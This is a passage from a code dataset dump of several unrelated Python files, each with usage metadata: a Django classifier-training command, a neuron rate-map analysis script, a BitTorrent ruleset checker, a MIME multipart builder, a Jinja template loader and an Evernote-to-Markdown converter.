"call"}, {"api_name": "pytest.mark", "line_number": 317, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 342, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.testing.assert_equal", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 349, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 334, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 334, "usage_type": "attribute"}]} +{"seq_id": "575085980", "text": "from django.core.management.base import BaseCommand\nimport numpy as np\nimport pickle\nimport os\nimport sys\nimport gc\n\nsys.path.append(os.getcwd())\nfrom web_app.models import Table\nfrom clf_model.nb_model.naive_bayes import MultinomialNaiveBayes\nfrom preprocess import word_segmentation, bags_of_words, split\nfrom scrape.config import TOP_CATEGORY\n\nMODEL_DUMP_PATH = \"web_app/classification_dump\"\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n \"\"\"\n seedsを指定する関数\n\n :param parser:\n :return:\n \"\"\"\n parser.add_argument('-s'\n '--seeds',\n dest='seeds',\n type=int,\n default=None)\n\n def _dump_model(self, preprocess_obj, model_obj):\n \"\"\"作成したモデルを保存する関数\n\n :param preprocess_obj:\n :param model_obj:\n :return:\n \"\"\"\n with open(os.path.join(MODEL_DUMP_PATH, 'preprocess.pickle'),\n mode='wb') as f:\n pickle.dump(preprocess_obj, f)\n\n with open(os.path.join(MODEL_DUMP_PATH, 'model.pickle'),\n mode='wb') as f:\n pickle.dump(model_obj, f)\n\n def _create_model(self, SEEDS):\n \"\"\"モデルを作成して保存する一連の関数\n\n :param SEEDS:\n :return:\n \"\"\"\n print('わかち書き開始')\n x = np.array([word_segmentation.wakachi(data.content) for data in\n Table.objects.all()])\n y = np.array(\n [TOP_CATEGORY[data.category] for data in Table.objects.all()])\n\n print('seeds = {}でデータを分割'.format(SEEDS))\n train_x, train_y, _, _ = split.split_train_test(x, y, seeds=SEEDS)\n\n # メモリ節約のため削除\n del x\n del y\n gc.collect()\n\n print('単語ベクトル学習開始')\n preprocess_obj = bags_of_words.Bow()\n processed_train_x = np.array(preprocess_obj.fit_transform(train_x),\n dtype=np.float32)\n\n #  メモリ節約のため削除\n del train_x\n gc.collect()\n\n print('モデル学習開始')\n model_obj = MultinomialNaiveBayes()\n model_obj.fit(processed_train_x, train_y)\n\n print('モデルのdump開始')\n self._dump_model(preprocess_obj, model_obj)\n\n print('DONE')\n\n def handle(self, *args, **options):\n \"\"\"カスタムコマンドが呼び出された時に動く関数\n\n :param args:\n :param options:\n :return:\n \"\"\"\n print(\"START\")\n SEEDS = options['seeds']\n self._create_model(SEEDS)\n", "sub_path": "web_app/management/commands/command_create_model.py", "file_name": "command_create_model.py", "file_ext": "py", "file_size_in_byte": 2718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "preprocess.word_segmentation.wakachi", "line_number": 54, "usage_type": "call"}, {"api_name": "preprocess.word_segmentation", "line_number": 54, "usage_type": "name"}, {"api_name": "web_app.models.Table.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "web_app.models.Table.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "web_app.models.Table", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "scrape.config.TOP_CATEGORY", "line_number": 57, "usage_type": "name"}, {"api_name": "web_app.models.Table.objects.all", "line_number": 57, "usage_type": "call"}, {"api_name": "web_app.models.Table.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "web_app.models.Table", "line_number": 57, "usage_type": "name"}, {"api_name": "preprocess.split.split_train_test", "line_number": 60, "usage_type": "call"}, {"api_name": "preprocess.split", "line_number": 60, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 65, "usage_type": "call"}, {"api_name": "preprocess.bags_of_words.Bow", "line_number": 68, "usage_type": "call"}, {"api_name": "preprocess.bags_of_words", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gc.collect", "line_number": 74, "usage_type": "call"}, {"api_name": "clf_model.nb_model.naive_bayes.MultinomialNaiveBayes", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "643832438", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 14 21:28:15 2017.\n\n@author: spiros\n\"\"\"\n\nimport numpy as np\nimport pickle\nimport sys\nimport os\nimport time\nimport scipy.ndimage.filters as flt\nfrom functions_analysis import spike_map, binning\n\n\ndef analysis_path_cluster(ntrial, case, learning, inter):\n\n folder1 = 'data_analysis'\n\n os.system('mkdir -p '+folder1+'/figures_interneurons/')\n os.system('mkdir -p '+folder1+'/metrics_interneurons/')\n fdname1 = '/'+folder1+'/figures_interneurons/'\n fdname2 = '/'+folder1+'/metrics_interneurons/'\n\n cond = '../Simulation_Results/'+learning+'/'+case\n print(\"Analyse ... \" + case + \" trial \"+ntrial + \" \" + learning)\n\n os.system('mkdir -p '+folder1+'/figures_interneurons/'+learning+'/')\n os.system('mkdir -p '+folder1+'/metrics_interneurons/'+learning+'/')\n # Define the map size!\n maindir = os.getcwd()\n\n # Give path dimensions\n # Give path dimensions\n npath_x = 200\n npath_y = 1\n # Number of pyramidal\n Ncells = 130\n Nbins = 100\n skernel = 3.0 / (npath_x/Nbins)\n runsAll = 5\n\n # Number of basket cells\n if inter == 'bcell':\n Ncells = 8\n elif inter == 'vipcck' or inter == 'vipcrnvm':\n Ncells = 1\n elif inter == 'vipcr':\n Ncells = 4\n elif inter == 'olm' or inter == 'aacell' or inter == 'bscell':\n Ncells = 2\n\n # 3-d matrix of all interneurons\n rateMaps = np.zeros((Ncells, Nbins, npath_y))\n rateMaps_unsmoothed = np.zeros((Ncells, Nbins, npath_y))\n time_array_in_bin = np.zeros((Ncells, Nbins, npath_y))\n\n # File location - pathfile\n fileload = folder1 + '/metrics_permutations/'+learning\n\n with open(fileload+'/path_all_trial_'+str(ntrial)+'.pkl', 'rb') as f:\n path_all = pickle.load(f)\n\n # Loop for all INs\n for ncell in range(Ncells):\n # A matrix for rate map\n Zall = np.zeros((Nbins, npath_y))\n time_array_all = np.zeros(Nbins*npath_y)\n\n for nrun in range(1, runsAll+1):\n\n # Load of path -- different for each run\n path = path_all[nrun-1]\n\n # make the time - space map\n time_array = np.bincount(path[:, 0])[1:]\n csum = np.cumsum(time_array)\n\n fileload = cond+'/Trial_' + \\\n str(ntrial)+'/Run_'+str(nrun)+'/spiketimes_'+inter+'_.pkl'\n with open(fileload, 'rb') as f:\n spiketimes_all = pickle.load(f)\n spiketimes = spiketimes_all[ncell][1:]\n\n Z = spike_map(spiketimes, csum, npath_x, npath_y)\n # Take the sum over all runs given by total\n Zall += binning(Z, Nbins, 'summing')\n time_array_binned = binning(time_array, Nbins, 'summing').squeeze()\n\n # time spent in each bin in ms\n time_array_all += time_array_binned / 1000.0\n\n # Calculate the time spent in each bin\n time_array_smoothed = flt.gaussian_filter1d(\n time_array_all, sigma=skernel, mode='nearest', truncate=3.0)\n Zsmoothed = flt.gaussian_filter1d(\n Zall.squeeze(), sigma=skernel, mode='nearest', truncate=3.0)\n # convert to Hz, so divide with seconds\n # time ms/1000 (ms/sec) --> seconds\n Zmean = np.divide(Zsmoothed, time_array_smoothed)\n\n rateMaps_unsmoothed[int(ncell), :, :] = Zall\n rateMaps[int(ncell), :, :] = Zmean.reshape(-1, 1)\n time_array_in_bin[int(ncell), :, :] = time_array_all.reshape(-1, 1)\n\n print('\\nDone with the rate maps')\n\n # ==============================================================================\n # ##################### RATE MAPS SAVING #################################\n # ==============================================================================\n filesave = maindir+fdname2+learning\n\n mydict = {}\n mydict['maps'] = rateMaps\n mydict['maps_unsmoothed'] = rateMaps_unsmoothed\n mydict['time_in_bin'] = time_array_in_bin\n if not os.path.exists(filesave):\n os.makedirs(filesave)\n\n with open(filesave+'/pickled_sn_'+inter+'_'+case+'_'+ntrial+'.pkl', 'wb') as handle:\n pickle.dump(mydict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n print(\"\\nDone with \"+case+\" analysis. Done with trial \"+ntrial)\n\n\ntic = time.time()\nntrial = sys.argv[1]\ncase = sys.argv[2]\nlearning = sys.argv[3]\ninter = sys.argv[4]\nresults = analysis_path_cluster(ntrial, case, learning, inter)\ntoc = time.time()\n\nprint(\"\\nTotal time: \"+str(round(toc-tic, 3))+\" seconds\")\n", "sub_path": "AnalysisRawData/heatmaps_interneurons.py", "file_name": "heatmaps_interneurons.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.system", "line_number": 22, "usage_type": "call"}, {"api_name": "os.system", "line_number": 23, "usage_type": "call"}, {"api_name": "os.system", "line_number": 30, "usage_type": "call"}, {"api_name": "os.system", "line_number": 31, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 84, "usage_type": "call"}, {"api_name": "functions_analysis.spike_map", "line_number": 87, "usage_type": "call"}, {"api_name": "functions_analysis.binning", "line_number": 89, "usage_type": "call"}, {"api_name": "functions_analysis.binning", "line_number": 90, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters.gaussian_filter1d", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters", "line_number": 96, "usage_type": "name"}, {"api_name": "scipy.ndimage.filters.gaussian_filter1d", "line_number": 98, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.divide", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 120, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 123, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 123, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 129, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 130, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 131, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 132, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "489649688", "text": "#exit 0 // OK\n#exit 1 // Warning (if applicable)\n#exit 2 // Critical error\n#test\n\nimport requests\nimport sys,os\nimport crypto\nsys.modules['Crypto'] = crypto\nfrom Crypto.Cipher import AES #pip install pycrypto, install crypto\nimport base64\n\nclass Crypt():\n\tdef encryption(self, privateInfo, key):\n\t\tBLOCK_SIZE = 16\n\t\tPADDING = '{'\n\t\tpad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING\n\t\tEncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))\n\t\tkey = str(key)\n\t\tif len(key) < 16:\n\t\t\tkey = key + (\"0\" * (16 - len(key)))\n\t\tcipher = AES.new(key)\n\t\tencoded = EncodeAES(cipher, str(privateInfo))\n\t\treturn encoded.decode(\"utf-8\")\n\n\tdef decryption(self, encryptedString, key):\n\t\tPADDING = b'{'\n\t\tDecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)\n\t\tencryption = str(encryptedString)\n\t\tkey = str(key)\n\t\tif len(key) < 16:\n\t\t\tkey = key + (\"0\" * (16 - len(key)))\n\t\tcipher = AES.new(key)\n\t\tdecoded = DecodeAES(cipher, encryption)\n\t\treturn decoded.decode(\"utf-8\")\n\n\tdef encrypt(self, privateInfo, key):\n\t\tif 'list' in str(privateInfo.__class__):\n\t\t\trez = []\n\t\t\tfor item in privateInfo:\n\t\t\t\trez.append(self.encryption(item, key))\n\t\t\treturn rez\n\t\telse:\n\t\t\treturn self.encryption(privateInfo, key)\n\n\tdef decrypt(self, privateInfo, key):\n\t\tif 'list' in str(privateInfo.__class__):\n\t\t\trez = []\n\t\t\tfor item in privateInfo:\n\t\t\t\trez.append(self.decryption(item, key))\n\t\t\treturn rez\n\t\telse:\n\t\t\treturn self.decryption(privateInfo, key)\n\nclass Check():\n\tdef __init__(self):\n\t\tself.allowedProducts=['utorrent','bittorrent','utmac','btmac','hydra-ut','hydra-bt']\n\n\tdef usage(self):\n\t\tprint('Usage: '+os.path.basename(__file__)+' product\\n\\tproduct: \\n\\t\\t', end='')\n\t\tprint(self.allowedProducts)\n\t\tprint('\\n\\tkey\\n\\t\\tThe secret key to decrypt credentials\\n\\n\\tExample: '+os.path.basename(__file__)+' \\'utorrent,bittorrent,btmac\\' secretKey123')\n\t\tsys.exit(1)\n\n\tdef unknown(self):\n\t\tprint ('Unknown product: '+sys.argv[1]+'\\n')\n\t\tself.usage()\n\n\tdef parse(self): # todo: use urllib.urlparser instead\n\t\tif len(sys.argv)<3:\n\t\t\tself.usage()\n\t\tproducts=sys.argv[1].replace(\"'\",'').split(',')\n\n\t\tfor product in products:\n\t\t\tprint(product)\n\t\t\tif product not in self.allowedProducts:\n\t\t\t\tself.unknown()\n\t\trez=[]\n\t\tfor product in products:\n\t\t\tfor url in self.getUrls(product):\n\t\t\t\trez.append(url)\n\t\t\tif len(rez)==0:\n\t\t\t\tprint(\"Failed to load rules for product\")\n\t\t\t\tsys.exit(2) #no rules was found for product\n\t\treturn rez\n\n\tdef req(self,product):\n\t\theaders = {'api-key':crypt.decrypt('qDLdfOQKGzHe7zgHO5NPngpIcJ0jjCntbHtZBSb8cj0=',sys.argv[2])}\n\t\ttry:\n\t\t\tUTr=requests.get('https://cherryui.bittorrent.com/api/v2/ruleset/'+product+'/',headers=headers, timeout=3)\n\t\t\tUTdata=UTr.text\n\t\t\treturn UTdata\n\t\texcept:\n\t\t\tprint('Error - request timeout.')\n\t\t\tsys.exit(1)\n\n\tdef getUrls(self,product):\n\t\tr=self.req(product).split(',')\n\t\tz=0\n\t\trez=[]\n\t\tfor word in r:\n\t\t\tif word[1:5]=='uuid':\n\t\t\t\tz=z+1\n\t\t\t\ttmp=('http://download-01.utorrent.com/uuid/'+word[8:len(word)-1])\n\t\t\t\trez.append(tmp)\n\t\t\t\ttmp=('http://download-02.utorrent.com/uuid/'+word[8:len(word)-1])\n\t\t\t\trez.append(tmp)\n\t\treturn rez[2:] #Returns list or real urls for 'product' (cutting first 2 empty cherry links)\n\n\n\nif __name__=='__main__':\n\tcrypt=Crypt()\n\tcheck=Check()\n\tprint(check.parse())\n\tsys.exit(0)\n\n\n\n", "sub_path": "checkCherryRules.py", "file_name": "checkCherryRules.py", "file_ext": "py", "file_size_in_byte": 3269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.modules", "line_number": 9, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 18, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 22, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 22, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 28, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 33, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 66, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 88, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "373456151", "text": "#!/usr/bin/python\nimport os\nimport argparse\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEBase import MIMEBase\nfrom email import Encoders\n\ndef makemultipart(atomfile, package, outfile):\n atompart = MIMEBase('application', 'atom+xml')\n atompart.add_header('Content-Disposition', 'attachment; name=atom')\n atompart.set_payload(atomfile.read())\n\n payloadpart = MIMEBase('application', 'zip')\n payloadpart.add_header('Content-Disposition',\n 'attachment; name=payload; filename=%s' % os.path.basename(\n package.name))\n payloadpart.set_payload(package.read())\n Encoders.encode_base64(payloadpart)\n\n message = MIMEMultipart('related')\n message.attach(atompart)\n message.attach(payloadpart)\n\n # print(message.as_string(unixfrom=False))\n outfile.write(message.as_string(unixfrom=False))\n outfile.close()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Create a multipart file from an atom entry and a package '\n '(zip, word, odt)')\n parser.add_argument('atomfile', help='/path/to/atomfile', type=open)\n parser.add_argument('package', help='/path/to/package', type=open)\n parser.add_argument('outfile', help='name of output file', type=argparse.FileType('w + '))\n args = parser.parse_args()\n makemultipart(args.atomfile, args.package, args.outfile)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "contentcopytool/lib/makemultipart.py", "file_name": "makemultipart.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "email.MIMEBase.MIMEBase", "line_number": 9, "usage_type": "call"}, {"api_name": "email.MIMEBase.MIMEBase", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "email.Encoders.encode_base64", "line_number": 18, "usage_type": "call"}, {"api_name": "email.Encoders", "line_number": 18, "usage_type": "name"}, {"api_name": "email.MIMEMultipart.MIMEMultipart", "line_number": 20, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "18081674", "text": "#--------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# Module TemplateLoader...\n#\n#------------------------------------------------------------------------\n\n\"\"\"Implementation of a Jinja template loader.\n\nThis loader looks for files in $SIT_DATA/psddl/templates directories.\nOne template file can contain multiple templates, each template is\npreceeded by a line starting with \"::::template::::\" string followed\nby spaces and the name of a template which is a single word, any words \nfollowing template name are ignored (can be used for comments). Lines\nstarting with colon are ignored.\n\nThis software was developed for the LCLS project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@version $Id$\n\n@author Andy Salnikov\n\"\"\"\n\n\n#------------------------------\n# Module's version from CVS --\n#------------------------------\n__version__ = \"$Revision$\"\n# $Source$\n\n#--------------------------------\n# Imports of standard modules --\n#--------------------------------\nimport sys\nimport os\nimport re\n\n#---------------------------------\n# Imports of base class module --\n#---------------------------------\nimport jinja2 as ji\n\n#-----------------------------\n# Imports for other modules --\n#-----------------------------\n\n#----------------------------------\n# Local non-exported definitions --\n#----------------------------------\n\n#------------------------\n# Exported definitions --\n#------------------------\n\n\n#---------------------\n# Class definition --\n#---------------------\nclass TemplateLoader(ji.FileSystemLoader):\n\n #----------------\n # Constructor --\n #----------------\n def __init__(self, package='psddl', templateSubDir='templates'):\n '''Loads templates for psddl. Similar to the jinja2 PackageLoader()\n function but adapted for packages within the SIT build system\n (as opposed to Python packages.)\n ARGS:\n templateSubdir - a subdirectory to the data directory of the \n package.\n\n Due to an issue with jinja 2.8, we cache the templates ourselve, we\n expect the environment to be created with a cache_size of 0\n '''\n self.package=package\n self.templateSubDir=templateSubDir\n path = os.environ['SIT_DATA'].split(':')\n ji.FileSystemLoader.__init__(self, path)\n\n self.template_cache={}\n #-------------------\n # Public methods --\n #-------------------\n\n def get_source(self, environment, template):\n if template in self.template_cache:\n return self.template_cache[template]\n orig_template_name = template\n # template name is the file name followed by \"?template\"\n fname, template = template.split('?')\n\n # prepend package/templateSubDir to path (defaults to psddl/templates)\n fname = os.path.join(\"%s/%s\" % (self.package,self.templateSubDir), fname)\n\n # call base class method\n source, path, helper = ji.FileSystemLoader.get_source(self, environment, fname)\n\n # iterate over lines, find a template\n tmpl = []\n collect = False\n for line in source.splitlines(True):\n words = line.split()\n if words and words[0] == \"::::template::::\":\n if words[1] == template:\n collect = True\n else:\n collect = False\n elif line and line[0] == ':':\n pass\n elif collect: \n tmpl.append(line)\n templateSource = ''.join(tmpl)\n self.template_cache[orig_template_name] = (templateSource, path, helper)\n return ''.join(tmpl), path, helper\n\n #--------------------------------\n # Static/class public methods --\n #--------------------------------\n\n #--------------------\n # Private methods --\n #--------------------\n\n#\n# In case someone decides to run this module\n#\nif __name__ == \"__main__\" :\n\n # In principle we can try to run test suite for this module,\n # have to think about it later. Right now just abort.\n sys.exit ( \"Module is not supposed to be run as main module\" )\n", "sub_path": "src/TemplateLoader.py", "file_name": "TemplateLoader.py", "file_ext": "py", "file_size_in_byte": 4170, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "jinja2.FileSystemLoader", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 80, "usage_type": "attribute"}, {"api_name": "jinja2.FileSystemLoader.__init__", "line_number": 81, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jinja2.FileSystemLoader.get_source", "line_number": 99, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "11045215", "text": "# encoding: utf-8\n# vim: sts=4 sw=4 fdm=marker\n# Author: kakkyz \n# License: MIT\nimport markdown\nimport xml.sax.saxutils\nimport re\n\n# TODO: use vim indent length?\n__INDENT__ = 4 * \" \"\n\nclass parserOption: # {{{\n def __init__(self):\n self.a = False\n self.ul = 0\n self.ol = 0\n self.li = 0\n self.pre = False\n self.code = False\n self.p = False\n self.blockquote = 0\n self.listCount = 0\n\n def __str__(self):\n return \"a={0} ul={1} ol={2} li={3} pre={4} code={5} p={6} blockquote={7} listCount={8} \".format(\n self.a,\n self.ul,\n self.ol,\n self.li,\n self.pre,\n self.code,\n self.p,\n self.blockquote,\n self.listCount)\n#}}}\n\nremoveheadercode = re.compile('^')\nremovefootercode = re.compile('$')\n\n\ndef parseENML(node, level=0, result='', option=parserOption()): # {{{\n# import html2text\n# return html2text.html2text(node.toxml())\n# print node.toxml()\n# print \"{0}:{1}:{2}:{3}:{4}:{5}\".format(\n# level ,\n# _getNodeType(node) ,\n# _getTagName(node),\n# _getAttribute(node),\n# _getData(node), option)\n if node.nodeType == node.ELEMENT_NODE:\n tag = _getTagName(node)\n if tag == \"en-note\":\n for child in node.childNodes:\n if child.nodeType == node.ELEMENT_NODE:\n # Partition block\n if len(result) == 0 or result[-2:] == '\\n\\n':\n pass\n elif result[-1:] == '\\n':\n result += '\\n'\n else:\n result += '\\n\\n'\n result += parseENML(child, level + 1, \"\", option) + '\\n'\n elif node.nodeType == node.TEXT_NODE:\n result += parseENML(child, level + 1, \"\", option)\n elif tag == \"a\":\n htmlhref = _getAttribute(node)\n option.a = True\n htmltext = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n option.a = False\n# result += '[{0}]({1})'.format(htmltext, htmlhref) # this code does not work multibyte!\n result += '[' + htmltext + '](' + htmlhref + ')'\n elif tag == \"pre\":\n option.pre = True\n result += \"\".join([parseENML(child, level + 1, result, option) for child in node.childNodes])\n option.pre = False\n elif tag == \"code\":\n option.code = True\n if option.pre == True:\n # precode = removeheadercode.sub('', xml.sax.saxutils.unescape(node.toxml()))\n precode = removeheadercode.sub('', _unescape(node.toxml()))\n precode = removefootercode.sub('', precode)\n for line in precode.splitlines():\n result += __INDENT__ + \"%s\\n\" % line.rstrip()\n result += \"\\n\"\n else:\n # incode = removeheadercode.sub('`', xml.sax.saxutils.unescape(node.toxml()))\n incode = removeheadercode.sub('`', _unescape(node.toxml()))\n incode = removefootercode.sub('`', incode)\n result += incode\n option.code = False\n elif tag == \"p\":\n option.p = True\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = re.compile(r'').sub(' ', result)\n result += '\\n'\n option.p = False\n elif tag == \"ul\":\n option.ul += 1\n option.listCount = 0\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n # print \"'\"+result+\"'\"\n option.ul -= 1\n elif tag == \"ol\":\n option.ol += 1\n option.listCount = 0\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n option.ol -= 1\n elif tag == \"li\":\n option.li += 1\n option.listCount += 1\n listCount = option.listCount\n\n indent = __INDENT__ * (option.li - 1)\n if _getTagName(node.parentNode) == 'ul':\n result += indent + \"* \"\n elif _getTagName(node.parentNode) == 'ol':\n result += indent + str(option.listCount) + \". \"\n\n for child in node.childNodes:\n cont = parseENML(child, level + 1, '', option)\n if cont.strip():\n if child.nodeType == node.ELEMENT_NODE \\\n and _getTagName(child) in ['ul', 'ol']:\n if result[-1] != '\\n':\n result += '\\n'\n else:\n # ['strong', 'em']\n if result[-1] != ' ':\n result += ' '\n result += cont\n if result[-1] != '\\n':\n result += '\\n'\n option.listCount = listCount\n option.li -= 1\n elif tag == \"strong\":\n result = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = '**' + result + '**'\n elif tag == \"em\":\n result = \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = '_' + result + '_'\n elif tag in [\"img\", \"br\", \"en-media\", \"en-todo\", \"en-crypt\"]: # 後で改行を除去して見やすくする?\n result += node.toxml()\n result += \"\\n\"\n elif tag == \"blockquote\":\n option.blockquote += 1\n result += \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n result = \"\\n\".join(['> ' + line for line in result[:-1].split(\"\\n\")]) + \"\\n\"\n option.blockquote -= 1\n if level == 0:\n result += \"\\n\"\n elif tag == \"hr\":\n result += \"-----\"\n elif tag in [\"h1\", \"h2\", \"h3\", \"h4\", \"h5\", \"h6\"]:\n headerlv = tag[1:]\n result += (\"#\" * int(headerlv)) + \" \" + \"\".join([parseENML(child, level + 1, \"\", option) for child in node.childNodes])\n else:\n result += \"\".join([parseENML(child, level + 1, result, option) for child in node.childNodes])\n elif node.nodeType == node.TEXT_NODE:\n text = _getData(node)\n if text:\n result += text\n if not option.pre:\n result = _clearNeedlessSpace(result)\n return result\n#}}}\n\n\ndef parseMarkdown(mkdtext): # {{{\n m = markdown.markdown(mkdtext.decode('utf-8'))\n return m\n#}}}\n\n# ----- private methods\n\n\ndef _getTagName(node): # {{{\n if node.nodeType == node.ELEMENT_NODE:\n return node.tagName\n return None\n#}}}\n\n\ndef _getData(node): # {{{\n \"\"\" return textdata \"\"\"\n if node.nodeType == node.TEXT_NODE:\n return node.data.strip()\n return \"\"\n#}}}\n\ndef _unescape(text): # {{{\n import HTMLParser\n return HTMLParser.HTMLParser().unescape(text)\n#}}}\n\ndef _clearNeedlessSpace(text):\n text = re.compile(r'[ \\t]*\\n[ \\t]*').sub('\\n', text)\n return re.compile(r'[ \\t]+').sub(' ', text)\n\ndef _getAttribute(node): # {{{\n try:\n if _getTagName(node) == \"a\":\n return node.getAttribute(\"href\")\n except:\n pass\n return None\n#}}}\n\n\ndef _getNodeType(node): # {{{\n \"\"\" return NodeType as String \"\"\"\n if node.nodeType == node.ELEMENT_NODE : return \"ELEMENT_NODE\"\n elif node.nodeType == node.ATTRIBUTE_NODE : return \"ATTRIBUTE_NODE\"\n elif node.nodeType == node.TEXT_NODE : return \"TEXT_NODE\"\n elif node.nodeType == node.CDATA_SECTION_NODE : return \"CDATA_SECTION_NODE\"\n elif node.nodeType == 